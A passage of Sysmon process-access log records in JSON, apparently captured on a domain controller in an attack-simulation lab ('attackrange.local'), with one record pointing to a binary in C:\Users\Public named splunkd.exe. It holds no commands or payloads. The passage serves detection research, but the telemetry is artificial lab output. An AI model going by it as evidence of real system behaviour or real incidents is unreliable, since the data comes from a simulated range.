{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.013\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.013","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.013\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-00101EAC1100}\r\nTargetProcessId: 4472\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.013","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-00101EAC1100}","TargetProcessId":"4472","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.044\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-001093AF1100}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.044","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-001093AF1100}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9103,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.044\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-001093AF1100}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.044","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-001093AF1100}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9104,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.060\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C6-5F25-0000-001093AF1100}\r\nTargetProcessId: 1936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.060","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C6-5F25-0000-001093AF1100}","TargetProcessId":"1936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9105,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.107\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001077CD1000}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.107","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001077CD1000}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9106,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.107\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001077CD1000}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:34.107","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A5-5F25-0000-001077CD1000}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9107,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:34.107\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A5-5F25-0000-001077CD1000}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 